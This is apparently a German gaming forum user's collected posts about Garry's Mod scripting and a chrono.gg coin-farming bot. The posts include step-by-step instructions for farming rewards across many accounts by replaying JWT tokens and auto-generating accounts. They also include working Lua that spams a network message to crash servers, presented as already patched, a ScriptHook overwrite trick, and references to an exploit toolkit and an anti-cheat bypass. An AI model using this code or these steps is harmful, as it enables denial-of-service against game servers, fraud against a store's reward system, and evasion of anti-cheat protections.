Beiträge von K03

    Wie bereits im Thread angesprochen Release ich hier den chrono.gg bot, da ich faul bin und nicht alles erklären will(nochmal)
    lest euch am besten den alten thread durch.


    Anmerkung zur Installation, im Datei pfad befindet sich eine Datei mit dem Name "user.dat" in diese müsst ihr eure id/token(wird im alten post erklärt) einfügen ohne irgendwelche Zusätze wie Anführungszeichen oder Leerzeichen ( jede zeile eine id ) wenn ihr es richtig installiert habt sollte es in etwa so aussehen SO!


    Unter Windows könnt ihr einfach die eine der gewünschten bat's ausführen( je nach dem ob ihr ein gui möchtet oder nicht).
    Unter Linux einfach die main.pyw ausführen (bitte versichert euch requests herunter geladen zu haben), ihr habt zudem comandline befehle wie -debug( für text und Status Meldungen) und -nogui, fals ihr auf eine Betriebssystem ohne gui arbeitet.


    Beta Version Download:


    a

    nein machen sie nicht (heutzutage im dslight Zeitalter ist ip ban / ip Überwachung eh kaum noch möglich da mehrer Haushalte dich die gleiche ip teilen )
    ja aber das geht, jedoch kannst du nur 1 pro tag die coins claimen (die haben noch so ein streak System), aber Prizipiell ja klar, wenn du hilfe beim Setup brauchst oder den automatischen Account generiere stelle ich ihn dir gerne zur verfügung( schreib einfach privat )

    Einführung:


    Also wer es nicht kennt es gibt eine Seite die heißt Chrono welche jeden tag spiele verkauft für ein billigeren preis, der Entwickler bekommt dann mehr vom Umsatz bla bla, diese haben sogenannte Chronocoins, welche ihr duch tägliches einloggen und anschauen (bzw claimen) bekommen könnt(bild), mit diesen coins könnt ihr euch dann im Shop Game Keys kaufen, Shop(bild).



    Wie bekomm ich jetzt am einfachsten Spiele?
    wir haben uns ein kleines JavaScript geschrieben, welches man im Browser ausführen kann, der automatisch für mehrere Accounts diese coins Farmen kann, hierzu benötigt man eine Möglichkeit Js in eine Website zu Injecten.


    Also zur Theorie, man muss sich zwar anmelden jedoch arbeitet die Webseite mit JWT diese sind Tokens die der Server ausstellt um euch zu identifizieren, diese werden vom Server Validiert und nur er kann diese ausstellen( wenn ihr fragen habt wie das funktioniert schriebt mich an ).
    Wir senden einfach das token von dem account den wir gerne hätten und sind direkt angemeldet (ohne ein pw oder user Name speicher zu müssen), dass nutzen wir aus und gehen so eine liste von Accounts durch ( und drücken automatisch auf den Claim knopf ).
    Sobald wir angemeldet sind klicken wir (automatisch) auf den Claim Reward, sodass wir die Coins bekommen.


    Wie installiere ich das Script?
    1. Zuerst müsst ihr Javascript auf einer fremden Website injecten können, hierzu empfele ich:


    Chrome Plugin: Chrome Plugin für Javascript Injection
    Firefox: Firefox Plugin für Js Injection


    2. Account(s) erstellen und die JWT Tokens auslesen( hier nur in Chrome gezeigt )
    erstellt euch ein Account dann meldet euch an, geht danach in die Developer console( f12) und gebt dort localStorage.getItem("jwt") ein und die console printet euch das Erkennuns token welches ihr zum anmelden bracht


    3. Das Script aufsetzen
    am anfang vom script steht:var idis = [] hier müsst ihr jetzt eure Tokens einsetzen ( nicht vergessen ein Anführungszeichen und mehrere mit komma trennen), also wenn eure ids z.b hallo123 und hallo124 sind sollte es so aussehen var idis = ["hallo123","hallo124"].


    4. Profit
    jetzt müsst ihr nur noch jeden tag einmal die Website besuchen und jede id einmal in der promt. auswähln( 0 bis anzahl accounts -1 ).



    Wie es am ende aussehen sollte: BILD ( diese Bild ist ohne ids die müsst ihr natürlich eintragen)
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    Zusatz


    Wir haben das alles mithilfe von Selenium noch auf das "nächste Level gebraucht" indem wir in python uns ein Programm geschrieben haben der all das automatisch kann ( also er kann selbst Accouns erstellen, emails empfangen( wir haben es auf einem Server laufen gehabt ), und dann grinden) wer Interesse an dem Programm hat, bzw sich mit python(3.6) auskennt, installiert Selenium(ihr braucht die Chrome treiber ) und macht es mit diesem script ich weiß nicht viele kennen sich aus mit selenium und python deshalb werde ich hier nicht allzusehr ins Detail gehen (dies ist eine Simplere Version davon)


    Bei Fragen und Unklarheiten am besten Kommentieren weil vil andere die gleichen Probleme haben,
    MFG K03 <3

    hier sind ein paar sample exploits einfach im exploitkit lua hinten dran schreiben ;D


    mein exploit toolkit nicht fertig hab daran das letzte mal vor ca 1 jahr gearbeitet aber funktioniert. Nur 1 exploit immoment integriert

    Code
    (nur link da der Code zulang ist :( )
    
    
    https://pastebin.com/vJ4m9FQM
    
    
    "Ihre Nachricht ist zu lang. Es stehen maximal 10.000 Zeichen zur Verfügung. "

    sample payloads folgen

    hallo ich bins, 1k03 ich hab mal paar alte Dateien duchgeschaut und hab mein ersten cac Bypass gefunden Gl hf.
    MFG K03 :thumbup:<3

    Spiele wie CsGo, HMSkyrim, STO, HMFallout4 , Payday 2.


    Und ich weiß , dass du sagen willst ,dass es an der Hardware liegt. Das kann nicht sein. Bzw: nicht 100%
    Denn ich habe eine GTX840 mit 16 Kernen. Deswegen hilft es, multicore rendering zu aktivieren , auch wenn es nur 8 kerne triggert.

    bin mir sehr sicher, dass es keine gtx 840 gibt liste hier und btw eine grafikkarte mit 16 kernen ? vil CUDA Cores aber dann wären 16 echt krass wenig ( eine gtx 970 hat z.b 1664 )



    Danke @PeridotPower. Wie gesagt: Gmod hat wahrscheinlich probleme, multicore rendering zu aktivieren. Naja mal schauen.

    naja es läuft schon gut das problem ist pac und ps zerstören einfach die fps mit den ganzen models


    hab ein relativ guten pc und hab auf meinem server so um die 250 -400 fps aber sobald ich auf instinkt's geh kratz ich an der 60 fps marke


    hab ein weg noch 10 mehr raus zu holen indem man alle pac hook's blockt aber naja

    vor nicht all zu langer zeit *gestern* ist mir ein exploit auf den instinkt servern aufgefallen er hat mit einem Entity overflow zutun der durch das Emblem addon verursacht wird.
    Hierbei wird an den Server Eine anfrage auf das Spanen des Emblem Sprays gesendet, jedoch wird das Serverseitig falsch gehandhabt was zu einem Crash des Server's führt.

    Es wird führ jedes Spray ein neues Entity gesapawnt was dazu führt das irgend wann der server zuviel Entity's hat und abstürzt.


    Wie Exploite ich die Schwachstelle ?


    Code
    hook.Add( "Think" , "" , function() 
    	for k = 0 , 100 do 
    		net.Start("CreateBadgeSpray")
    		net.SendToServer()
    	end
    end)

    Ich spamme einfach den Reciever während ich auf den Boden oder ähnliches schau dadurch das der server führ jedes spray ein neues Entity spawnt overflow't' er in nur wenigen Sekunden..




    So da ich weiß das die Schwachstelle gefixt ist ( ich habe intinkt ein Patch gegeben und es wurde der Creator benachrichtigt ) habe ich mal eine Aufgabe( ja ihr müsst denken ):


    Wie würdet ihr am Effizientesten den Exploit fixen schreibt ein Code oder Eure Ideen hier als Kommentare :thumbsup:


    <3 K03 <3

    -Was bewirkt der Bug?
    Scoreboard ist kapput errors und gmod crash


    -ist der Bug schon bekannt?
    kp


    -Gibt es irgendeinen Spieleinfluss auf die aktuellen Runden?
    nein


    -Auf welchem Server der Bug vorkommt
    dem : 176.57.128.5:27025


    -Weitere Punkte, die ihr denkt seinen zu dem Bug wichtig
    der bug tritt nicht immer auf und dann auch nur wenn ich tab drücke dann nach ca 5 sec bekomm ich time out

    Man kann die Scripthook.lua überschriben weil jemand nicht aufgepasst ;D


    RunString( [[return false]], "../ScriptHook.lua", false )


    man könnte damit z.b ein cheater Scripthook so überschrieben, das er auf egal welchem server ist disconnected oder schreibt "im a cheater" oder was auch immer,
    der Fehler ist mir vorhin aufgefallen als ich ein Src hider Geschriben habe btw Hier: ( Fals ihr mit external & scripthook arbeitet )

    Code
    local src = debug.getinfo( 1 ).short_src
    if( !string.find( src , ".lua" ) ) then 
    	src = src .. ".lua"
    end 
    RunStringEx( "//nothing to see", src )

    er verhindert das scripthook eure scripts von externel speichert ( gegen filestealer und so )

    chat example:


    *DEAD* Aurora: hallo
    (TEAM) xXMinecraftHDXXLXx: tach
    *DEAD* Aurora: was geht ?
    (TEAM) xXMinecraftHDXXLXx: nicht viel bei dir?
    *DEAD* Aurora: auch
    (TEAM) xXMinecraftHDXXLXx: cool <- kontextsensitiv antwortet nur wenn davor gefragt wurde was er macht